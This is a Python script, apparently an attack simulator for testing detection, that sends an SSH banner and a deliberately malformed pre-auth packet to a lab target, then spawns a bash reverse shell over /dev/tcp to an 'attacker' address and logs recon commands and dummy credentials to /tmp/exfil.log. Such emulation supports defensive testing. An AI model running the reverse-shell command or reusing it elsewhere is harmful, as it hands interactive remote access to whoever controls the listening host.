import ipaddress
import os
import socket
import subprocess
import time
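# Lab IPs.
#
# Each value can be overridden through the environment (LAB_TARGET_IP,
# LAB_ATTACKER_IP, LAB_ATTACKER_PORT) so the harness can be pointed at a
# different lab host without editing the file; the defaults are the original
# hard-coded values.  attacker_ip and attacker_port are interpolated into a
# bash command line by trigger_reverse_shell(), so they are normalised here to
# a literal IP address and an in-range port rather than accepted as arbitrary
# text -- anything else raises ValueError at import time instead of reaching
# the shell.
target_ip = str(ipaddress.ip_address(os.environ.get("LAB_TARGET_IP", "192.168.1.100")))
attacker_ip = str(ipaddress.ip_address(os.environ.get("LAB_ATTACKER_IP", "192.168.1.1")))
attacker_port = int(os.environ.get("LAB_ATTACKER_PORT", "4444"))
if not 0 < attacker_port < 65536:
    raise ValueError(f"LAB_ATTACKER_PORT out of range: {attacker_port}")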
def build_ssh_version() -> bytes:
    """Return the client identification line sent first on the connection.

    This is the CRLF-terminated SSH-2.0 banner the target's SSH server sees
    (and will usually log) before any binary packet; the product token
    identifies the traffic as coming from this test harness.
    """
    banner = "SSH-2.0-ErlangTest_0.1"
    return f"{banner}\r\n".encode("ascii")
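def build_crafted_packet(length: int = 16, filler: int = 0x41) -> bytes:
    """Return the length-prefixed blob sent after the version banner.

    The frame is a big-endian uint32 ``length`` followed by ``length`` copies
    of ``filler``; the defaults (16 x 0x41, 'A') reproduce the original
    hard-coded packet byte for byte.  The parameters exist so a detection test
    can vary the size or content without editing the file.

    NOTE(review): this is deliberately not a well-formed SSH binary packet.
    Read as one (RFC 4253 s6), the first byte after the length would be a
    padding_length larger than the packet itself, so a conformant server is
    expected to reject it and drop the connection.  Treat it as a canary for
    "junk pre-auth traffic after the banner", not as an exploit payload for
    any particular CVE.

    Args:
        length: number of filler bytes; also the value of the length prefix.
        filler: byte value (0..255) repeated ``length`` times.

    Raises:
        ValueError: if ``length`` is negative or ``filler`` is not a byte.
        OverflowError: if ``length`` does not fit in 32 bits.
    """
    if length < 0:
        raise ValueError(f"length must be non-negative, got {length}")
    if not 0 <= filler <= 0xFF:
        raise ValueError(f"filler must be a single byte value, got {filler:#x}")
    return length.to_bytes(4, "big") + bytes([filler]) * length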
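def trigger_reverse_shell() -> int:
    """Spawn an interactive bash reverse shell back to attacker_ip:attacker_port.

    This runs on the host executing the script, not on the target: the command
    is launched locally with os.system, which is the point of the simulation
    -- it produces the process and network telemetry of a reverse shell for a
    detection stack to observe.  The call blocks until that shell exits, so
    anything sequenced after it (see send_exploit) waits for the operator to
    close the session.

    attacker_ip and attacker_port are interpolated into a bash command line,
    so they are re-validated here as a literal IP address and a port number;
    anything else raises ValueError instead of being handed to the shell.
    The ``/dev/tcp`` redirection is a bash builtin feature, hence the explicit
    ``/bin/bash -c`` wrapper.

    Returns:
        The raw os.system() status of the outer bash process.

    Raises:
        ValueError: if attacker_ip is not an IP literal or attacker_port is
            not a valid port.
    """
    host = ipaddress.ip_address(attacker_ip)
    port = int(attacker_port)
    if not 0 < port < 65536:
        raise ValueError(f"attacker_port out of range: {port}")
    print(f"[+] Triggering reverse shell to {host}:{port}")
    return os.system(f"/bin/bash -c 'bash -i >& /dev/tcp/{host}/{port} 0>&1'")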
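def simulate_post_exploitation(log_path: str = "/tmp/exfil.log") -> None:
    """Write benign "post-exploitation" artefacts to ``log_path``.

    Appends the output of ``whoami``, ``uname -a`` and ``ls -alh /home/`` and
    then a pair of dummy credential lines, so a detection or DLP pipeline has
    a concrete file to find.  Everything runs on the local host.

    Hardening versus the original os.system / shell-redirect version:
      * each command runs through subprocess with an argv list and no shell,
        with stdout/stderr sent straight to the open log file;
      * the log is opened with O_NOFOLLOW (where the platform has it) and
        created mode 0600, so a symlink pre-planted at the well-known /tmp
        path cannot redirect the write and the fake credentials are not
        world-readable;
      * a command that cannot be executed is recorded in the log instead of
        aborting, preserving the best-effort behaviour of os.system.

    Args:
        log_path: file to append to; defaults to the original /tmp/exfil.log.
    """
    commands = (
        ["whoami"],                # Command 1: whoami
        ["uname", "-a"],           # Command 2: system info
        ["ls", "-alh", "/home/"],  # Command 3: show directory structure
    )
    print("[+] Simulating post-exploitation behavior...")

    def _opener(path: str, flags: int) -> int:
        # Refuse to follow a symlink at the log path; create it owner-only.
        return os.open(path, flags | getattr(os, "O_NOFOLLOW", 0), 0o600)

    with open(log_path, "a", opener=_opener) as log:
        for argv in commands:
            # Flush our buffered writes before the child appends to the same fd
            # so the log stays in execution order.
            log.flush()
            try:
                subprocess.run(argv, stdout=log, stderr=subprocess.STDOUT, check=False)
            except OSError as exc:
                log.write(f"[!] could not run {' '.join(argv)}: {exc}\n")
        # Command 4: dummy file access
        log.write("\n[+] Simulated exfil of dummy credentials...\n")
        log.write("username: admin\npassword: hunter2\n")
    print(f"[+] Post-exploitation simulation written to {log_path}")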
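def send_exploit(*, timeout: float = 10.0) -> None:
    """Drive the whole simulation: banner, junk packet, local reverse shell, log.

    Connects to ``target_ip``:22, sends the SSH version banner followed by the
    crafted packet, closes the socket, and then -- on this host, regardless of
    what the target did with the traffic -- calls trigger_reverse_shell() and
    simulate_post_exploitation().  Nothing here checks for, or depends on,
    the target actually being exploited; the network step only exists to put
    the pre-auth SSH traffic pattern on the wire alongside the host telemetry.

    The socket is held in a context manager with a connect/send timeout, so a
    black-holed target cannot hang the harness indefinitely and the socket is
    released even if a send fails (the original leaked it on any exception).

    Args:
        timeout: seconds allowed for the connect and for each send.

    Raises:
        OSError (e.g. ConnectionRefusedError, socket.timeout): if the target
            cannot be reached.  This propagates as in the original script; the
            local reverse shell and log are then not produced.
    """
    print(f"[+] Connecting to target {target_ip}:22...")
    with socket.create_connection((target_ip, 22), timeout=timeout) as sock:
        sock.sendall(build_ssh_version())
        print("[+] Sent SSH version string")
        time.sleep(0.5)
        sock.sendall(build_crafted_packet())
        print("[+] Sent crafted SSH pre-auth packet")
        time.sleep(0.5)
    # Simulate reverse shell and post-exploit activity (both run locally).
    trigger_reverse_shell()
    time.sleep(1)
    simulate_post_exploitation()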
if __name__ == "__main__":
    # Script entry point: run the full simulation (network probe, local
    # reverse shell, post-exploitation log) and exit 0 when it returns.
    raise SystemExit(send_exploit())